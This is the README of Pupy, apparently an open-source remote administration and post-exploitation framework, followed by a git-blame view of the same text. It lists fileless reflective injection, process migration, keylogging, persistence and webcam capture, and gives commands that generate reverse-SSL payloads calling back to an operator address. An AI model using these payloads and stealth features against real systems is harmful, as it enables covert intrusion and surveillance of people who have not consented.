pupy/README.md

# Pupy
Pupy is an opensource, multi-platform Remote Administration Tool written in Python. On Windows, Pupy uses reflective dll injection and leaves no traces on disk.

## Features :
- On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)
- Pupy can reflectively migrate into other processes
- Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented). 
- modules are quite simple to write and pupy is easily extensible.
- Pupy uses [rpyc](https://github.com/tomerfiliba/rpyc) and a module can directly access python objects on the remote client
  - we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works !
- communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future
- all the non interactive modules can be dispatched on multiple hosts in one command
- Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu)
- modules can be executed as background jobs
- commands and scripts running on remote hosts are interruptible
- auto-completion and nice colored output :-)
- commands aliases can be defined in the config

## Implemented Modules :
- migrate
  - inter process architecture injection also works (x86->x64 and x64->x86)
- keylogger
- persistence
- screenshot
- webcam snapshot
- in memory execution of PE exe both x86 and x64 :)
- command execution
- download
- upload
- socks5 proxy
- local port forwarding
- interactive shell (cmd.exe, /bin/sh, ...)
- interactive python shell
- shellcode exec (thanks to @byt3bl33d3r)

##Quick start
In these examples the server is running on a linux host (tested on kali linux) and it's IP address is 192.168.0.1  
The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5) 
### generate/run a payload
#### for Windows
```bash
./pupygen.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe
```
you can also use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means.
#### for Linux
```bash
pip install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443
```

#### for MAC OS X
```bash
easy_install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443
```

### start the server
1. eventually edit pupy.conf to change the bind address / port
2. start the pupy server :
```bash
./pupysh.py
```

### Some screenshots
#####list connected clients
![screenshot1](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr1.png "screenshot1")
#####help
![screenshot3](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/help.png "screenshot3")
#####execute python code on all clients
![screenshot2](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr2.png "screenshot2")
#####execute a command on all clients, exception is retrieved in case the command does not exists
![screenshot4](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr3.png "screenshot4")
#####use a filter to send a module only on selected clients
![screenshot5](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/filters.png "screenshot5")
#####migrate into another process
![screenshot6](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/migrate.png "screenshot6")
#####interactive shell
![screenshot7](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/interactive_shell.png "screenshot7")
#####interactive python shell
![screenshot8](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/pyshell.png "screenshot8")
#####upload and run another PE exe from memory
![screenshot9](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/memory_exec.png "screenshot9")

##Example: How to write a MsgBox module
first of all write the function/class you want to import on the remote client  
in the example we create the file pupy/packages/windows/all/pupwinutils/msgbox.py 
```python
import ctypes
import threading

def MessageBox(text, title):
	t=threading.Thread(target=ctypes.windll.user32.MessageBoxA, args=(None, text, title, 0))
	t.daemon=True
	t.start()
```
then, simply create a module to load our package and call the function remotely
```python
class MsgBoxPopup(PupyModule):
	""" Pop up a custom message box """

	def init_argparse(self):
		self.arg_parser = PupyArgumentParser(prog="msgbox", description=self.__doc__)
		self.arg_parser.add_argument('--title', help='msgbox title')
		self.arg_parser.add_argument('text', help='text to print in the msgbox :)')

	@windows_only
	def is_compatible(self):
		pass

	def run(self, args):
		self.client.load_package("pupwinutils.msgbox")
		self.client.conn.modules['pupwinutils.msgbox'].MessageBox(args.text, args.title)
		self.log("message box popped !")

```

## Dependencies
rpyc (https://github.com/tomerfiliba/rpyc)

##Roadmap and ideas
Some ideas without any priority order
- support for https proxy
- bind instead of reverse connection
- add offline options to payloads like enable/disable certificate checking, embed offline modules (persistence, keylogger, ...), etc...
- integrate scapy in the windows dll :D (that would be fun)
- work on stealthiness and modules under unix systems
- mic recording
- socks5 udp support
- remote port forwarding
- perhaps write some documentation
- The backdoor factory ?
- Impacket ?
- exfiltration through obfsproxy obfuscated network stream ?
- ...
- any cool idea ?

## FAQ
> Does the server works on windows ?
Yes but it has not really been tested and it may be unstable
> I can't install it how does it work ?
pip install rpyc
> hey c4n y0u add a DDOS module plzz?
No.

## Contact
by mail: contact@n1nj4.eu  
on Twitter: [Follow me on twitter](https://twitter.com/n1nj4sec)  
[![Join the chat at https://gitter.im/n1nj4sec/pupy](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/n1nj4sec/pupy?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)  
If some of you want to participate or send me a feedback, don't hesitate :-)
Update README.md 2015-09-21 20:24:27 +00:00			`# Pupy`
local port forwarding module implemented ! 2015-09-26 11:33:42 +00:00			`Pupy is an opensource, multi-platform Remote Administration Tool written in Python. On Windows, Pupy uses reflective dll injection and leaves no traces on disk.`
readme added 2015-09-21 20:15:05 +00:00
			`## Features :`
			`- On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)`
			`- Pupy can reflectively migrate into other processes`
			`- Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented).`
			`- modules are quite simple to write and pupy is easily extensible.`
local port forwarding module implemented ! 2015-09-26 11:33:42 +00:00			`- Pupy uses [rpyc](https://github.com/tomerfiliba/rpyc) and a module can directly access python objects on the remote client`
readme added 2015-09-21 20:15:05 +00:00			`- we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works !`
			`- communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future`
			`- all the non interactive modules can be dispatched on multiple hosts in one command`
			`- Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu)`
			`- modules can be executed as background jobs`
			`- commands and scripts running on remote hosts are interruptible`
			`- auto-completion and nice colored output :-)`
			`- commands aliases can be defined in the config`

			`## Implemented Modules :`
PE memory execution ! 2015-10-08 17:36:37 +00:00			`- migrate`
readme added 2015-09-21 20:15:05 +00:00			`- inter process architecture injection also works (x86->x64 and x64->x86)`
PE memory execution ! 2015-10-08 17:36:37 +00:00			`- keylogger`
			`- persistence`
			`- screenshot`
			`- webcam snapshot`
			`- in memory execution of PE exe both x86 and x64 :)`
readme added 2015-09-21 20:15:05 +00:00			`- command execution`
			`- download`
			`- upload`
			`- socks5 proxy`
local port forwarding module implemented ! 2015-09-26 11:33:42 +00:00			`- local port forwarding`
readme added 2015-09-21 20:15:05 +00:00			`- interactive shell (cmd.exe, /bin/sh, ...)`
			`- interactive python shell`
adding kill command 2015-09-22 20:18:56 +00:00			`- shellcode exec (thanks to @byt3bl33d3r)`
readme added 2015-09-21 20:15:05 +00:00
			`##Quick start`
Update README.md 2015-09-21 20:24:27 +00:00			`In these examples the server is running on a linux host (tested on kali linux) and it's IP address is 192.168.0.1`
readme added 2015-09-21 20:15:05 +00:00			`The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)`
Update README.md 2015-09-21 20:24:27 +00:00			`### generate/run a payload`
readme added 2015-09-21 20:15:05 +00:00			`#### for Windows`
			```bash
readme update 2015-09-30 20:18:20 +00:00			`./pupygen.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe`
readme added 2015-09-21 20:15:05 +00:00			```
correction of typo in the README 2015-09-22 06:48:24 +00:00			`you can also use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means.`
readme added 2015-09-21 20:15:05 +00:00			`#### for Linux`
			```bash
			`pip install rpyc #(or manually copy it if you are not admin)`
			`python reverse_ssl.py 192.168.0.1:443`
			```

			`#### for MAC OS X`
			```bash
			`easy_install rpyc #(or manually copy it if you are not admin)`
			`python reverse_ssl.py 192.168.0.1:443`
			```

modified: README 2015-09-21 21:26:47 +00:00			`### start the server`
readme added 2015-09-21 20:15:05 +00:00			`1. eventually edit pupy.conf to change the bind address / port`
Update README.md 2015-09-21 20:24:27 +00:00			`2. start the pupy server :`
readme added 2015-09-21 20:15:05 +00:00			```bash
			`./pupysh.py`
			```
updated README 2015-09-21 20:50:01 +00:00
			`### Some screenshots`
			`#####list connected clients`
			`![screenshot1](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr1.png "screenshot1")`
			`#####help`
			`![screenshot3](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/help.png "screenshot3")`
			`#####execute python code on all clients`
			`![screenshot2](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr2.png "screenshot2")`
			`#####execute a command on all clients, exception is retrieved in case the command does not exists`
			`![screenshot4](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr3.png "screenshot4")`
			`#####use a filter to send a module only on selected clients`
			`![screenshot5](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/filters.png "screenshot5")`
			`#####migrate into another process`
			`![screenshot6](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/migrate.png "screenshot6")`
README updated 2015-09-21 21:12:18 +00:00			`#####interactive shell`
			`![screenshot7](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/interactive_shell.png "screenshot7")`
			`#####interactive python shell`
			`![screenshot8](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/pyshell.png "screenshot8")`
PE memory execution ! 2015-10-08 17:36:37 +00:00			`#####upload and run another PE exe from memory`
			`![screenshot9](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/memory_exec.png "screenshot9")`
updated README 2015-09-21 20:50:01 +00:00
Update README.md 2015-09-30 20:40:45 +00:00			`##Example: How to write a MsgBox module`
modified: README 2015-09-21 21:26:47 +00:00			`first of all write the function/class you want to import on the remote client`
			`in the example we create the file pupy/packages/windows/all/pupwinutils/msgbox.py`
			```python
			`import ctypes`
			`import threading`

			`def MessageBox(text, title):`
			`t=threading.Thread(target=ctypes.windll.user32.MessageBoxA, args=(None, text, title, 0))`
			`t.daemon=True`
			`t.start()`
			```
			`then, simply create a module to load our package and call the function remotely`
			```python
			`class MsgBoxPopup(PupyModule):`
			`""" Pop up a custom message box """`

			`def init_argparse(self):`
			`self.arg_parser = PupyArgumentParser(prog="msgbox", description=self.__doc__)`
			`self.arg_parser.add_argument('--title', help='msgbox title')`
			`self.arg_parser.add_argument('text', help='text to print in the msgbox :)')`

			`@windows_only`
			`def is_compatible(self):`
			`pass`

			`def run(self, args):`
			`self.client.load_package("pupwinutils.msgbox")`
			`self.client.conn.modules['pupwinutils.msgbox'].MessageBox(args.text, args.title)`
			`self.log("message box popped !")`

			```

updated README 2015-09-21 20:50:01 +00:00			`## Dependencies`
			`rpyc (https://github.com/tomerfiliba/rpyc)`

README updated 2015-09-21 21:12:18 +00:00			`##Roadmap and ideas`
			`Some ideas without any priority order`
README updated 2015-09-21 21:14:21 +00:00			`- support for https proxy`
modified: README 2015-09-21 21:26:47 +00:00			`- bind instead of reverse connection`
Fixed typo 2015-09-23 09:36:00 +00:00			`- add offline options to payloads like enable/disable certificate checking, embed offline modules (persistence, keylogger, ...), etc...`
README updated 2015-09-21 21:14:21 +00:00			`- integrate scapy in the windows dll :D (that would be fun)`
			`- work on stealthiness and modules under unix systems`
			`- mic recording`
			`- socks5 udp support`
local port forwarding module implemented ! 2015-09-26 11:33:42 +00:00			`- remote port forwarding`
modified: README 2015-09-21 21:26:47 +00:00			`- perhaps write some documentation`
PE memory execution ! 2015-10-08 17:36:37 +00:00			`- The backdoor factory ?`
			`- Impacket ?`
			`- exfiltration through obfsproxy obfuscated network stream ?`
README updated 2015-09-21 21:14:21 +00:00			`- ...`
			`- any cool idea ?`
README updated 2015-09-21 21:12:18 +00:00
PE memory execution ! 2015-10-08 17:36:37 +00:00			`## FAQ`
			`> Does the server works on windows ?`
			`Yes but it has not really been tested and it may be unstable`
			`> I can't install it how does it work ?`
			`pip install rpyc`
			`> hey c4n y0u add a DDOS module plzz?`
			`No.`

updated README 2015-09-21 20:50:01 +00:00			`## Contact`
Update README.md 2015-09-30 20:40:45 +00:00			`by mail: contact@n1nj4.eu`
			`on Twitter: [Follow me on twitter](https://twitter.com/n1nj4sec)`
			`[![Join the chat at https://gitter.im/n1nj4sec/pupy](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/n1nj4sec/pupy?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)`
			`If some of you want to participate or send me a feedback, don't hesitate :-)`
updated README 2015-09-21 20:50:01 +00:00